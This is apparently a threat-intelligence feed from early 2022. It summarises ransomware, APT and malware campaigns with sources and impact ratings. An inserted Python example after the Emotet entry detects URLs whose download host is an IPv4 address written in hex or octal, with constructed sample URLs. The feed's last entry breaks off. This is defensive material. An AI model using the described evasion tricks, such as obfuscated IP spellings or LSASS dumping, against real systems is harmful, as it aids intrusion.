LockBit 2.0 Ransomware TTPs
Date of Scan:
2022-02-16
Impact:
HIGH
Summary:
On 4 February 2022 the FBI issued a FLASH report on LockBit 2.0 ransomware together with a few IoCs. The Picus Security team has also shared the TTPs used by the LockBit 2.0 ransomware operators in emerging ransomware campaigns.
Source: https://www.picussecurity.com/resource/lockbit-2.0-ransomware-ttps-used-in-emerging-ransomware-campaigns
2022-02-15
Magecart attacking Magento sites
MEDIUM
+
Intel Source:
Sansec
Intel Name:
Magecart attacking Magento sites
Date of Scan:
2022-02-15
Impact:
MEDIUM
Summary:
According to Sansec, more than 350 ecommerce stores were infected with malware in a single day. All stores were victims of a payment skimmer loaded from a single domain. The domain is currently offline; the goal of the threat actors was to steal the credit card information of customers on the targeted online stores.
Source: https://sansec.io/research/naturalfreshmall-mass-hack
2022-02-15
BlackByte Ransomware
MEDIUM
+
Intel Source:
FBI FLASH
Intel Name:
BlackByte Ransomware
Date of Scan:
2022-02-15
Impact:
MEDIUM
Summary:
BlackByte ransomware has compromised multiple US and foreign businesses, including entities in at least three US critical infrastructure sectors (government facilities, financial, and food & agriculture). It recently made news when the ransomware attacked the San Francisco 49ers ahead of the Super Bowl.
Source: https://www.ic3.gov/Media/News/2022/220211.pdf
2022-02-14
OilRig's New Espionage Campaign-Out To Sea
MEDIUM
+
Intel Source:
ESET
Intel Name:
OilRig's New Espionage Campaign-Out To Sea
Date of Scan:
2022-02-14
Impact:
MEDIUM
Summary:
Researchers from ESET recently discovered a new campaign dubbed 'Out to Sea'. The campaign was attributed to APT34 (OilRig), which also has links with the Lyceum group. The group's malware toolset has evolved further, and it has come up with a backdoor named Marlin.
Source: https://www.welivesecurity.com/wp-content/uploads/2022/02/eset_threat_report_t32021.pdf
2022-02-11
Lorenz Ransomware
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
Lorenz Ransomware
Date of Scan:
2022-02-11
Impact:
MEDIUM
Summary:
Lorenz Ransomware was first seen in February 2021 and is believed to be a rebranding of the '.s40' ransomware. Lorenz Ransomware targets organisations worldwide with customised attacks, with victims mostly in English-speaking countries.
Source: https://www.cybereason.com/blog/cybereason-vs.-lorenz-ransomware
2022-02-11
CoinStomp Malware
MEDIUM
+
Intel Source:
Cado security
Intel Name:
CoinStomp Malware
Date of Scan:
2022-02-11
Impact:
MEDIUM
Summary:
Cado Security researchers have discovered a new malware campaign targeting Asian cloud service providers (CSPs). Researchers dubbed the malware CoinStomp; this malware family exploits cloud compute instances for the purpose of mining cryptocurrency.
Source: https://www.cadosecurity.com/coinstomp-malware-family-targets-asian-cloud-service-providers/
2022-02-11
Emotet dropping Cobalt Strike
HIGH
+
Intel Source:
ISC.SANS
Intel Name:
Emotet dropping Cobalt Strike
Date of Scan:
2022-02-11
Impact:
HIGH
Summary:
Researchers at SANS have dissected a Cobalt Strike sample dropped by Emotet and shared their analysis.
Source: https://isc.sans.edu/diary/rss/28318
2022-02-11
Transparent Tribe Group/APT36
HIGH
+
Intel Source:
Cisco Talos
Intel Name:
Transparent Tribe Group/APT36
Date of Scan:
2022-02-11
Impact:
HIGH
Summary:
Researchers from Talos recently analysed Crimson RAT and ObliqueRAT samples and were able to attribute the attack to the Transparent Tribe threat group, also known as APT36. The threat actor is known to target India. Their initial infection vector is usually an email purporting to come from official sources and containing a lure, which can be a Word document or, more often, an Excel spreadsheet.
Source: http://blog.talosintelligence.com/2022/02/whats-with-shared-vba-code.html
2022-02-11
SolarMarker Campaign
MEDIUM
+
Intel Source:
Sophos
Intel Name:
SolarMarker Campaign
Date of Scan:
2022-02-11
Impact:
MEDIUM
Summary:
SophosLabs has monitored a series of new efforts to distribute SolarMarker, an information stealer and backdoor. First detected in 2020, the .NET malware, usually delivered by a PowerShell installer, has information-harvesting and backdoor capabilities.
Source: https://news.sophos.com/en-us/2022/02/01/solarmarker-campaign-used-novel-registry-changes-to-establish-persistence/
2022-02-11
RedLine Stealer disguised as Windows 11 installer
MEDIUM
+
Intel Source:
HP
Intel Name:
RedLine Stealer disguised as Windows 11 installer
Date of Scan:
2022-02-11
Impact:
MEDIUM
Summary:
Threat actors started luring Windows 10 users soon after the announcement of the Windows 11 upgrade. They are using a fake Microsoft website to trick users into downloading and running a fake installer that executes the RedLine Stealer malware.
Source: https://threatresearch.ext.hp.com/redline-stealer-disguised-as-a-windows-11-upgrade/
2022-02-10
PrivateLoader
MEDIUM
+
Intel Source:
Intel471
Intel Name:
PrivateLoader
Date of Scan:
2022-02-10
Impact:
MEDIUM
Summary:
An analysis of a pay-per-install loader by Intel471 researchers has highlighted its place in the deployment of popular malware strains including SmokeLoader, Vidar and RedLine. PrivateLoader is mostly distributed through cracked software websites.
Source: https://intel471.com/blog/privateloader-malware
2022-02-10
Molerat Palestinian-Aligned Espionage campaign
HIGH
+
Intel Source:
Proofpoint
Intel Name:
Molerat Palestinian-Aligned Espionage campaign
Date of Scan:
2022-02-10
Impact:
HIGH
Summary:
Proofpoint researchers have discovered a new campaign that details the operations of the Molerat threat group, which is allegedly affiliated with Palestinian interests. TA402 is abusing Dropbox services not only for delivery of NimbleMamba but also for malware command and control (C2).
Source: https://www.proofpoint.com/us/blog/threat-insight/ugg-boots-4-sale-tale-palestinian-aligned-espionage
2022-02-09
QakBot Phishing campaign
HIGH
+
Intel Source:
DFIR Report
Intel Name:
QakBot Phishing campaign
Date of Scan:
2022-02-09
Impact:
HIGH
Summary:
Qakbot activity since October 2021 has been demystified by DFIR researchers. A malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk.
Source: https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
2022-02-09
SEO Poisoning distributes BATLOADER malware
HIGH
+
Intel Source:
Mandiant
Intel Name:
SEO Poisoning distributes BATLOADER malware
Date of Scan:
2022-02-09
Impact:
HIGH
Summary:
Mandiant researchers uncovered a malicious campaign using SEO poisoning to trick potential victims into downloading the BATLOADER malware. The attackers created malicious sites, packed them with keywords for popular software products, and used search engine optimization poisoning to make them show up higher in search results.
Source: https://www.mandiant.com/resources/seo-poisoning-batloader-atera
2022-02-09
Chinese APT Antlion targets financial institutions
LOW
+
Intel Source:
Symantec
Intel Name:
Chinese APT Antlion targets financial institutions
Date of Scan:
2022-02-09
Impact:
LOW
Summary:
Antlion (a Chinese state-backed APT) has been targeting financial institutions in Taiwan in a persistent campaign over the course of at least 18 months. The attackers deployed a custom backdoor, which Symantec has called xPack, on compromised systems, giving them extensive access to victim machines.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks
2022-02-09
Operation EmailThief
MEDIUM
+
Intel Source:
Volexity
Intel Name:
Operation EmailThief
Date of Scan:
2022-02-09
Impact:
MEDIUM
Summary:
An alleged Chinese threat actor tracked as TEMP_Heretic is actively attempting to exploit a zero-day XSS vulnerability in the Zimbra open-source email platform. The campaign has been named EmailThief. Successful exploitation of the cross-site scripting (XSS) vulnerability could allow threat actors to execute arbitrary JavaScript code.
Source: https://www.volexity.com/blog/2022/02/03/operation-emailthief-active-exploitation-of-zero-day-xss-vulnerability-in-zimbra/
2022-02-09
Lazarus APT targeting job seekers
LOW
+
Intel Source:
CyberGeeks
Intel Name:
Lazarus APT targeting job seekers
Date of Scan:
2022-02-09
Impact:
LOW
Summary:
Lazarus APT is yet again targeting job seekers, using job opportunity documents for companies such as Lockheed Martin, BAE Systems and Boeing. In this blog the researcher analysed a document called Boeing BDS MSE.docx, which focuses on people looking for jobs at Boeing. The malware extracts the hostname, username, network information, a list of processes and other information, which is exfiltrated to one of four C2 servers.
Source: https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/
2022-02-09
Arid Viper APT
MEDIUM
+
Intel Source:
Cisco Talos
Intel Name:
Arid Viper APT
Date of Scan:
2022-02-09
Impact:
MEDIUM
Summary:
Cisco Talos has observed a new wave of Delphi malware called Micropsia, developed and operated by the Arid Viper APT group since 2017. This campaign targets Palestinian entities and activists using politically themed lures. The group, believed to be based out of Gaza, is known to target organizations all over the world.
Source: http://blog.talosintelligence.com/2022/02/arid-viper-targets-palestine.html
2022-02-09
Mac Trojan:Update Agent
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Mac Trojan:Update Agent
Date of Scan:
2022-02-09
Impact:
MEDIUM
Summary:
The Mac trojan has evolved, and its latest incarnation, named UpdateAgent, has added multiple capabilities to its arsenal, such as bypassing Gatekeeper. It lures victims by impersonating legitimate software and can leverage Mac device functionality to its benefit.
Source: https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/
2022-02-08
Lockbit 2.0 TTP_Seeder Queries_07/02/2022
MEDIUM
+
Intel Source:
STR
Intel Name:
Lockbit 2.0 TTP_Seeder Queries_07/02/2022
Date of Scan:
2022-02-08
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-08
LockBit 2.0 Ransomware
HIGH
+
Intel Source:
FBI FLASH
Intel Name:
LockBit 2.0 Ransomware
Date of Scan:
2022-02-08
Impact:
HIGH
Summary:
LockBit 2.0 operates as an affiliate-based Ransomware-as-a-Service (RaaS) and employs a wide variety of tactics, techniques and procedures (TTPs). LockBit 2.0 ransomware compromises victim networks through a variety of techniques, including but not limited to purchased access, unpatched vulnerabilities, insider access and zero-day exploits.
Source: https://www.ic3.gov/Media/News/2022/220204.pdf
2022-02-08
Gold Dragon Malware
MEDIUM
+
Intel Source:
AhnLab
Intel Name:
Gold Dragon Malware
Date of Scan:
2022-02-08
Impact:
MEDIUM
Summary:
A new wave of activity from the Kimsuky hacking group has been spotted by the ASEC analysis team. The group was using xRAT (an open-source RAT), dropped alongside their custom backdoor dubbed Gold Dragon. The campaign started on January 24, 2022, targeting South Korean entities, and is still ongoing.
Source: https://asec.ahnlab.com/en/31089/
2022-02-08
QBot_Seeder Queries_07/02/2022
MEDIUM
+
Intel Source:
STR
Intel Name:
QBot_Seeder Queries_07/02/2022
Date of Scan:
2022-02-08
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-07
Blackcat Ransomware_Seeder Queries_04/02/2022
HIGH
+
Intel Source:
STR
Intel Name:
Blackcat Ransomware_Seeder Queries_04/02/2022
Date of Scan:
2022-02-07
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-07
BazarBackdoor malware campaign
MEDIUM
+
Intel Source:
Bleeping Computer
Intel Name:
BazarBackdoor malware campaign
Date of Scan:
2022-02-07
Impact:
MEDIUM
Summary:
A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware. The phishing emails pretend to be 'Payment Remittance Advice' with links to remote sites that download a CSV file with names similar to 'document-21966.csv.'
Source: https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/
2022-02-04
Mars Stealer- New variant of Oski Stealer
LOW
+
Intel Source:
@3xport
Intel Name:
Mars Stealer- New variant of Oski Stealer
Date of Scan:
2022-02-04
Impact:
LOW
Summary:
A new variant of the Oski stealer, named Mars Stealer, has been identified in the wild. It has the capability to steal information from all popular web browsers, two-factor authentication plugins, and multiple cryptocurrency extensions and wallets.
Source: https://3xp0rt.com/posts/mars-stealer
2022-02-04
StrifeWater RAT added to Iranian APT Moses Staff arsenal
MEDIUM
+
Intel Source:
Cybereason
Intel Name:
StrifeWater RAT added to Iranian APT Moses Staff arsenal
Date of Scan:
2022-02-04
Impact:
MEDIUM
Summary:
Researchers discovered a previously unidentified Remote Access Trojan (RAT) in the Moses Staff arsenal dubbed StrifeWater. The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks. The RAT possesses other capabilities such as command execution and screen capturing as well as the ability to download additional extensions.
Source: https://www.cybereason.com/blog/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations
2022-02-04
Sugar Ransomware
MEDIUM
+
Intel Source:
Walmart Global Tech Blog
Intel Name:
Sugar Ransomware
Date of Scan:
2022-02-04
Impact:
MEDIUM
Summary:
Recently a threat actor has started up a RaaS offering that appears to focus primarily on individual computers rather than entire enterprises, while also reusing objects from other ransomware families. Researchers analysed a sample from a tweet and identified it as Sugar Ransomware.
Source: https://medium.com/walmartglobaltech/sugar-ransomware-a-new-raas-a5d94d58d9fb
2022-02-04
White Tur Threat Group
MEDIUM
+
Intel Source:
PWC
Intel Name:
White Tur Threat Group
Date of Scan:
2022-02-04
Impact:
MEDIUM
Summary:
A newly detailed threat actor, dubbed 'White Tur', has been observed employing various techniques borrowed from multiple advanced persistent threat (APT) actors. The adversary hasn't been attributed to a specific geography, although it appears to have been active since at least 2017. It was also observed abusing the open source project OpenHardwareMonitor for payload execution.
Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html
2022-02-03
PowerLess Trojan by Phosphorus/APT35
HIGH
+
Intel Source:
Cybereason
Intel Name:
PowerLess Trojan by Phosphorus/APT35
Date of Scan:
2022-02-03
Impact:
HIGH
Summary:
Cybereason researchers recently discovered a new set of tools which were developed by the Phosphorus group and incorporated into their arsenal including a novel PowerShell backdoor dubbed PowerLess Backdoor. Research also highlights a stealthy technique used by the group to avoid PowerShell detection by running the PowerShell Backdoor in a .NET context rather than spawning the PowerShell process.
Source: https://www.cybereason.com/blog/powerless-trojan-iranian-apt-phosphorus-adds-new-powershell-backdoor-for-espionage
2022-02-03
MuddyWater targets Turkish users
HIGH
+
Intel Source:
Cisco Talos
Intel Name:
MuddyWater targets Turkish users
Date of Scan:
2022-02-03
Impact:
HIGH
Summary:
Researchers at Cisco Talos have observed a new campaign targeting Turkish private organizations alongside governmental institutions. They have attributed this campaign with high confidence to MuddyWater, which utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds.
Source: http://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html
2022-02-03
WhisperGate Lateral Movement_Seeder Queries_02/02/2022
HIGH
+
Intel Source:
STR
Intel Name:
WhisperGate Lateral Movement_Seeder Queries_02/02/2022
Date of Scan:
2022-02-03
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
2022-02-02
StellarParticle campaign by CozyBear/APT29
HIGH
+
Intel Source:
CrowdStrike
Intel Name:
StellarParticle campaign by CozyBear/APT29
Date of Scan:
2022-02-02
Impact:
HIGH
Summary:
Researchers at CrowdStrike have tracked the activities of the StellarParticle campaign and its association with the COZY BEAR adversary group. They also discuss the tactics and techniques leveraged in StellarParticle, a few of which are credential hopping, use of the TrailBlazer implant and a Linux variant of the GoldMax malware.
Source: https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/
2022-02-02
BotenaGo Malware
MEDIUM
+
Intel Source:
AT&T
Intel Name:
BotenaGo Malware
Date of Scan:
2022-02-02
Impact:
MEDIUM
Summary:
BotenaGo malware source code is now available to any malicious hacker or malware developer. With only 2,891 lines of code, BotenaGo has the potential to be the starting point for many new variants and new malware families using its source code. Alien Labs expects to see new campaigns based on BotenaGo variants targeting routers and IoT devices globally.
Source: https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github
Intel Source:
Symantec
Intel Name:
ShuckWorm targets Ukraine
Date of Scan:
2022-02-02
Impact:
MEDIUM
Summary:
Symantec researchers came across a cyber-espionage campaign targeting Ukraine. The campaign is attributed to the threat group Shuckworm (also known as Gamaredon), which is assessed to be a Russian state-sponsored group.
Source: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine
Intel Source:
Malwarebytes
Intel Name:
Lazarus APT
Date of Scan:
2022-02-02
Impact:
HIGH
Summary:
This attack by the North Korean Lazarus APT includes a clever use of the Windows Update client to execute the malicious payload and the use of GitHub as a command-and-control server.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/
Intel Source:
Federal Office_German Government
Intel Name:
APT 27 targetting German Companies
Date of Scan:
2022-02-01
Impact:
LOW
Summary:
The German government (BfV) warned of a Chinese cyber-espionage campaign, attributed to APT27, that has been targeting German companies by exploiting vulnerabilities in Microsoft Exchange and Zoho ADSelfService Plus. The HyperBro malware was used in this campaign.
Source: https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10 https://therecord.media/german-government-warns-of-apt27-activity-targeting-local-companies/
Intel Source:
Curated Intel
Intel Name:
Belarusian Cyber-Partisans group attack national railways
Date of Scan:
2022-02-01
Impact:
LOW
Summary:
The Belarusian hacktivist group known as the Belarusian Cyber-Partisans claimed responsibility for a limited attack against the national railway company. A primary objective of the attack, they claimed, was to hinder Russian troop movements inside Belarus. Reported TTPs include initial access via the BlueKeep RDP RCE (CVE-2019-0708) on a Windows Server 2008 R2 system, use of the 3proxy[.]ru service to launch attacks from a VPS, and use of Mimikatz to dump LSASS.
Source: https://www.curatedintel.org/2022/01/hacktivist-group-shares-details-related.html
Intel Source:
Cyfirma
Intel Name:
WaspLocker Ransomware
Date of Scan:
2022-02-01
Impact:
LOW
Summary:
WaspLocker is ransomware that encrypts files with AES and RSA, appends the .0.locked extension to encrypted files and places them in a folder with the .locked extension. It spreads via phishing, spear phishing and social engineering.
Source: https://www.cyfirma.com/outofband/ransomware-report-wasplocker/
Intel Source:
Internal
Intel Name:
Log4j 4 IP's
Date of Scan:
2022-01-31
Impact:
HIGH
Summary:
IP addresses linked to exploitation of the Log4j vulnerability.
Source: Internal Investigations
Intel Source:
Blackberry
Intel Name:
Prophet Spider exploiting Log4j Vulnerability
Date of Scan:
2022-01-31
Impact:
HIGH
Summary:
The BlackBerry Research team has correlated attacks by the Prophet Spider group with exploitation of the Log4j vulnerability in VMware Horizon. The researchers also note Prophet Spider TTPs consistent with selling network access to other criminals, including ransomware gangs. Despite VMware's patch and subsequent guidance, many deployments remain unpatched and susceptible to exploitation.
Source: https://blogs.blackberry.com/en/2022/01/log4u-shell4me
Intel Source:
MalwareBytes
Intel Name:
KONNI RAT
Date of Scan:
2022-01-31
Impact:
HIGH
Summary:
KONNI is a Remote Administration Tool that has been in use for at least 8 years. The North Korean threat actor using this malware has been identified under the Kimsuky umbrella. KONNI RAT is being actively developed, and new samples include significant updates.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/01/konni-evolves-into-stealthier-rat/
Intel Source:
Avast
Intel Name:
Chaes Banking Trojan
Date of Scan:
2022-01-31
Impact:
HIGH
Summary:
Researchers from Avast found that the Chaes banking Trojan has been actively spreading since November 2020. Chaes is notable for its multi-stage distribution method, which makes use of frameworks such as JScript, Python and NodeJS, binaries written in Delphi, and malicious Google Chrome extensions, among other things.
Source: https://decoded.avast.io/anhho/chasing-chaes-kill-chain/
Intel Source:
Sophos
Intel Name:
Midas Ransomware
Date of Scan:
2022-01-28
Impact:
MEDIUM
Summary:
An attack on a technology vendor was identified, and the ransomware behind it was Midas. The Midas ransomware attack highlights the risks of limited access controls and "ghost" tools. The attackers were able to spend nearly two months undetected in the target's environment.
Source: https://news.sophos.com/en-us/2022/01/25/windows-services-lay-the-groundwork-for-a-midas-ransomware-attack/ https://github.com/sophoslabs/IoCs/blob/master/Ransomware-Midas.csv
Intel Source:
Team Cymru
Intel Name:
Analysis of a Management IP Address linked to Molerats APT
Date of Scan:
2022-01-28
Impact:
MEDIUM
Summary:
Team Cymru analysed a management IP address linked to the Molerats APT. This higher-order infrastructure used IP addresses assigned to Palestinian providers. The targets identified were in Israel and Saudi Arabia.
Source: https://team-cymru.com/blog/2022/01/26/analysis-of-a-management-ip-address-linked-to-molerats-apt/
Intel Source:
Morphisec
Intel Name:
AsyncRAT
Date of Scan:
2022-01-28
Impact:
MEDIUM
Summary:
Morphisec researchers have identified a new, sophisticated delivery campaign that evades multiple AV products. Through a simple phishing email with an HTML attachment, the attackers deliver AsyncRAT, a remote access trojan designed to remotely monitor and control infected computers over an encrypted connection.
Source: https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign
Intel Source:
WeLiveSecurity
Intel Name:
DazzleSpy macOS malware
Date of Scan:
2022-01-27
Impact:
MEDIUM
Summary:
ESET researchers discovered a new watering-hole attack targeting macOS users who visited a pro-democracy radio station website in Hong Kong, infecting them with the DazzleSpy malware.
Source: https://www.welivesecurity.com/2022/01/25/watering-hole-deploys-new-macos-malware-dazzlespy-asia/
Intel Source:
Cofense
Intel Name:
TrickBot Invoices
Date of Scan:
2022-01-27
Impact:
HIGH
Summary:
In this new campaign, TrickBot is taking advantage of supply-chain delays and sending phishing emails with an invoice attachment that claims to be from USPS. The campaign shows more effort than past TrickBot campaigns, both in design and in the email itself; TrickBot campaign emails are usually relatively plain and easily spotted as suspicious.
Source: https://cofense.com/blog/trickbot-malware-delivered-as-invoicess
Intel Source:
STR
Intel Name:
PKEXEC LPE/CVE-2021-4034_Seeder Queries
Date of Scan:
2022-01-26
Impact:
MEDIUM
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
STR
Intel Name:
WhisperGate TTP_Seeder Queries
Date of Scan:
2022-01-26
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
IBM
Intel Name:
Trickbot's new evasion technique
Date of Scan:
2022-01-25
Impact:
HIGH
Summary:
According to IBM Security Intelligence researchers, TrickBot operators have been escalating activity. As part of that escalation, the malware's injections have been fitted with added protection to keep researchers out and get past security controls.
Source: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/
Intel Source:
QI-ANXIN Threat Intelligence Center
Intel Name:
OceanLotus APT attack
Date of Scan:
2022-01-25
Impact:
HIGH
Summary:
The state-sponsored threat actor group known as OceanLotus is using the web archive file format to evade detection while delivering backdoors. A report from QI-ANXIN Threat Intelligence Center states that OceanLotus's campaign is actively using web archive files (.MHT and .MHTML) in its attacks.
Source: https://mp.weixin.qq.com/s/1L7o1C-aGlMBAXzHqR9udA
Intel Source:
Netskope
Intel Name:
Infected PowerPoint Files Using Cloud Services to Deliver Multiple Malware
Date of Scan:
2022-01-25
Impact:
MEDIUM
Summary:
Researchers at Netskope have identified an increase in the use of one specific Microsoft Office file type: PowerPoint. These relatively small files are delivered through phishing emails and then download and execute malicious scripts through LOLBins, a common technique used to stay under the radar.
Source: https://www.netskope.com/blog/infected-powerpoint-files-using-cloud-services-to-deliver-multiple-malware
Intel Source:
Trend Micro
Intel Name:
APT36/Earth Karkaddan
Date of Scan:
2022-01-25
Impact:
HIGH
Summary:
According to Trend Micro researchers, the suspected Pakistani threat actor group APT36, also known as Earth Karkaddan, has expanded its malware arsenal with a new Android RAT, CapraRAT.
Source: https://www.trendmicro.com/en_us/research/22/a/investigating-apt36-or-earth-karkaddans-attack-chain-and-malware.html
Intel Source:
Fortinet
Intel Name:
STRRAT Malware
Date of Scan:
2022-01-25
Impact:
MEDIUM
Summary:
Researchers at Fortinet identified an email found to carry a variant of the STRRAT malware as an attachment. STRRAT is a multi-capability Remote Access Trojan that dates to at least mid-2020. Unusually, it is Java-based, and it is typically delivered to victims via phishing email.
Source: https://www.fortinet.com/blog/threat-research/new-strrat-rat-phishing-campaign
Intel Source:
Cleafy Labs
Intel Name:
BRATA RAT malware
Date of Scan:
2022-01-25
Impact:
MEDIUM
Summary:
Researchers from Cleafy have tracked BRATA malware and have documented its evolution in terms of both new targets and new features.
Source: https://www.cleafy.com/cleafy-labs/how-brata-is-monitoring-your-bank-account
Intel Source:
Proofpoint
Intel Name:
DTPacker
Date of Scan:
2022-01-24
Impact:
MEDIUM
Summary:
Researchers at Proofpoint have identified a .NET malware packer they have dubbed "DTPacker". The packer is typically used to pack remote access trojans that can steal information and load follow-on payloads such as ransomware.
Source: https://www.proofpoint.com/us/blog/threat-insight/dtpacker-net-packer-curious-password-1
Intel Source:
STR
Intel Name:
MoonBounce Implant_Seeder Queries
Date of Scan:
2022-01-24
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
Zscaler
Intel Name:
Molerats APT Espionage campaign
Date of Scan:
2022-01-24
Impact:
HIGH
Summary:
The Zscaler ThreatLabz team detected several macro-based MS Office files uploaded from Middle Eastern countries. The files used decoy themes related to the geopolitical conflict between Israel and Palestine, themes that have featured in previous Molerats APT campaigns.
Source: https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east
Intel Source:
Gemini Advisory
Intel Name:
FIN7 trojanized USB
Date of Scan:
2022-01-24
Impact:
HIGH
Summary:
Gemini Advisory researchers found the FIN7 group using flash drives to spread a remote access trojan. The trojanized USB devices ultimately load the IceBot Remote Access Trojan (RAT), giving FIN7 unauthorized remote access to systems within victims' networks.
Source: https://geminiadvisory.io/fin7-flash-drives-spread-remote-access-trojan/
Intel Source:
ASEC
Intel Name:
DDoS IRC Bot Malware
Date of Scan:
2022-01-24
Impact:
LOW
Summary:
The ASEC research team has discovered DDoS IRC bot strains disguised as adult games being distributed via webhards, file-sharing platforms commonly used to distribute malware in Korea, through which njRAT and UDP RAT were distributed in the past.
Source: https://asec.ahnlab.com/en/30755/
Intel Source:
Trend Micro
Intel Name:
Emotet Spam
Date of Scan:
2022-01-24
Impact:
HIGH
Summary:
Trend Micro researchers observed Emotet spam campaigns that abuse unconventional IP address formats in download URLs, such as hexadecimal and octal representations of the host address, to evade pattern-based detection and deliver the malware.
Source: https://www.trendmicro.com/en_us/research/22/a/emotet-spam-abuses-unconventional-ip-address-formats-spread-malware.html
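The Emotet entry above concerns URLs in which the download host is an IPv4 address written in hexadecimal or octal rather than dotted decimal, a spelling that browsers, curl and the C resolver all accept but that naive string matching against a blocklist misses. The Python below is an added example, not Trend Micro's code or anything from this feed: it canonicalizes every inet_aton-style spelling (0x hex, leading-zero octal, fewer than four components, a bare 32-bit integer) and flags any URL whose host is an IP literal written in a non-canonical way. The URLs in it are constructed for the demo and are not indicators from the report.

```python
import re
from urllib.parse import urlsplit

# Constructed URLs for this demo (hosts and paths are invented, not indicators from the report):
# one address spelled in dotted decimal, hex, octal, as a 32-bit integer and with three
# components, plus a plain hostname for contrast.
SAMPLE_URLS = [
    "http://185.7.214.7/invoice/",
    "http://0xb907d607/invoice/",
    "http://0271.07.0326.07/invoice/",
    "http://3104298503/invoice/",
    "http://185.7.54791/invoice/",
    "http://example.com/invoice/",
]

_HEX = re.compile(r"0[xX][0-9a-fA-F]+")
_OCT = re.compile(r"0[0-7]*")          # a leading zero means octal; "0" alone is zero
_DEC = re.compile(r"[1-9][0-9]*")


def _component(part):
    """Decode one address component with C inet_aton rules; raise ValueError for anything
    else, including malformed octal such as "08", which the C library also rejects."""
    if _HEX.fullmatch(part):
        return int(part, 16)
    if _OCT.fullmatch(part):
        return int(part, 8)
    if _DEC.fullmatch(part):
        return int(part, 10)
    raise ValueError(f"not a numeric component: {part!r}")


def normalize_ipv4(host):
    """Return the canonical dotted-decimal form of an IPv4 literal in any inet_aton spelling,
    or None if the host is not such a literal. With fewer than four components the last one
    supplies all remaining low-order bytes (a.b.c.d, a.b.c, a.b, a)."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        values = [_component(p) for p in parts]
    except ValueError:
        return None
    *head, last = values
    if any(v > 0xFF for v in head):
        return None
    tail_bits = 8 * (4 - len(head))
    if last >= 1 << tail_bits:
        return None
    addr = 0
    for v in head:
        addr = (addr << 8) | v
    addr = (addr << tail_bits) | last
    return ".".join(str((addr >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def url_host(url):
    """Host of a URL, canonicalized if it is an IPv4 literal; hostnames are returned unchanged."""
    host = urlsplit(url).hostname or ""
    return normalize_ipv4(host) or host


def is_obfuscated_ip_literal(url):
    """True when the URL's host is an IPv4 literal written in anything but plain dotted decimal."""
    host = urlsplit(url).hostname or ""
    canonical = normalize_ipv4(host)
    return canonical is not None and canonical != host


if __name__ == "__main__":
    for url in SAMPLE_URLS:
        print(f"{url:40} -> {url_host(url):15} obfuscated={is_obfuscated_ip_literal(url)}")
```

glibc's inet_aton and the Windows inet_addr accept exactly these forms, which is why the trick works at all; the parser is re-implemented here instead of calling socket.inet_aton so the behaviour is the same on every platform and so a malformed component such as 08 is rejected the way the C library rejects it. Match blocklists and log searches on the canonical form returned by url_host, and alert on is_obfuscated_ip_literal regardless of reputation, since a mail-delivered link has no legitimate reason to spell an address this way.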
Intel Source:
STR
Intel Name:
AIKIDO C2_Seeder Queries - 24/01/2022
Date of Scan:
2022-01-24
Impact:
HIGH
Summary:
This research is part of Securonix Threat Labs - Threat Research Team
Source: STR Repository
Intel Source:
WeLiveSecurity
Intel Name:
DONOT Hacking team/APT-C-35/SectorE02
Date of Scan:
2022-01-21
Impact:
MEDIUM
Summary:
ESET researchers take a deep look into recent attacks carried out by Donot Team throughout 2020 and 2021 targeting government and military entities in several South Asian countries.
Source: https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/
Intel Source:
BitDefender
Intel Name:
BHUNT Stealer
Date of Scan:
2022-01-21
Impact:
MEDIUM
Summary:
Bitdefender researchers have discovered a new family of crypto-wallet stealer malware dubbed "BHUNT". The samples identified appear to be digitally signed with a certificate issued to a software company, but the certificate does not match the binaries.
Source: https://www.bitdefender.com/files/News/CaseStudies/study/411/Bitdefender-PR-Whitepaper-CyberWallet-creat5874-en-EN.pdf
Intel Source:
INKY
Intel Name:
DoL Phishing
Date of Scan:
2022-01-21
Impact:
MEDIUM
Summary:
